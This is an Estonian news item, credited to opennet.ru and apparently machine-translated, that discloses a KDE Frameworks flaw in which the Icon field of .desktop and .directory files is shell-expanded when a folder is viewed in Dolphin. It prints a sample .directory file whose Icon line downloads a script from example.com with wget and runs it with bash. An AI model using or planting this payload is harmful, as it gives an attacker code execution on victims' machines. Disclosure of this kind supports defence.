KDE haavatavus, mis võimaldab koodi käivitada failide nimekirja vaatamisel

KDE-s tuvastatud haavatavus, misle, et ründaja suudab täita juhuslikke käske, kui kasutaja vaatab katalooge või arhiive, mis sisaldavad spetsiaalselt vormindatud „.desktop“ ja „.directory“ faile. Rünnakuks piisab, kui kasutaja lihtsalt vaatab failide nimekirja failihalduris Dolphin, laadib alla pahatahtliku desktop-faili või lohistab hiirega otsetee töölauale või dokumenti. Probleem ilmneb aktuaalses väljaandes KDE Frameworks 5.60.0 ja vanemates versioonides, kuni KDE 4-ni. Haavatavust ei ole jäänud veel parandatud (CVE-d ei ole sellele määratud).

Probleemi põhjustab KDesktopFile klassi vale rakendamine, mis töötleb muutuja „Icon“ eksitavalt ja edastab väärtuse funktsioonile KConfigPrivate::expandString(), mis viib shell-spetsiaal märkide avamise protsessini, sealhulgas töötleb stringe „$(..)“ kui käsu täitmiseks. Vastupidiselt XDG spetsifikatsiooni nõuetele teostatakse shell-ehituste avamine ilma seadete tüübi eristamiseta, st mitte ainult käivitatava rakenduse käsurea määramisel, vaid ka vaikeikoonide määramisel.

Näiteks, rünnaku jaoks on piisavalt saata kasutajale zip-arhiiv, mis sisaldab katalooge failiga «.directory», nagu:

[Desktop Entry]
Type=Directory
Icon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)

Kui proovitakse arhvi sisu vaadata failihalduris Dolphin, laaditakse ja käivitatakse skript https://example.com/FILENAME.sh.


Vaata videot

Allikas: opennet.ru

Osta usaldusväärne veebihosting DDoS kaitsega, VPS VDS serverid 🔥 Osta usaldusväärne veebihosting DDoS kaitsega, VPS VDS serverid | ProHoster